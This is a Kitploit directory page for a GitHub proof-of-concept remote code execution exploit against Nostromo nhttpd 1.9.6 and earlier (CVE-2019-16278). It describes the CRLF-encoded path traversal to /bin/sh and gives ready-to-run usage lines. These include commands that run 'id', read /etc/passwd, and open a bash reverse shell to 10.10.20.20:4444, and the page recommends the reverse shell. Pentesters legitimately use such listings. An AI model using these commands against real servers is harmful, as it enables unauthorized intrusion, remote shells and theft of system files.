Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-16278 — PoC RCE exploit for Nostromo nhttpd ≤ 1.9.6 | Kitploit
Tools/GitHubGitHub/andknownmaly/cve-2019-16278
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubandknownmaly/cve-2019-16278

CVE-2019-16278

PoC RCE exploit for Nostromo nhttpd ≤ 1.9.6

View Repository
39 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-16278 - Nostromo nhttpd RCE

Vulnerability Description

Remote Code Execution vulnerability in Nostromo nhttpd versions <= 1.9.6 via directory traversal in the HTTP request handling.

Affected Versions

  • Nostromo nhttpd 1.9.6 and earlier

Exploit Details

This exploit leverages a directory traversal vulnerability using URL-encoded CRLF characters (%0d) to access /bin/sh and execute arbitrary commands.

How it works:

  1. Sends a POST request with path traversal: /.%0d./.%0d./.%0d./.%0d./bin/sh
  2. Uses Content-Length header to control payload size
  3. Executes commands via shell redirection: echo\necho\n<command> 2>&1

Usage

Download Tool
root@kitploit:~
python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>

Example:

root@kitploit:~
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"

Reverse shell Recomended, sometimes this script show nothing

Requirements

  • Python 3
  • Network access to target server
  • Target running vulnerable Nostromo nhttpd

References

  • CVE: CVE-2019-16278
  • https://www.exploit-db.com/exploits/47837
  • https://nvd.nist.gov/vuln/detail/CVE-2019-16278

Disclaimer

This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.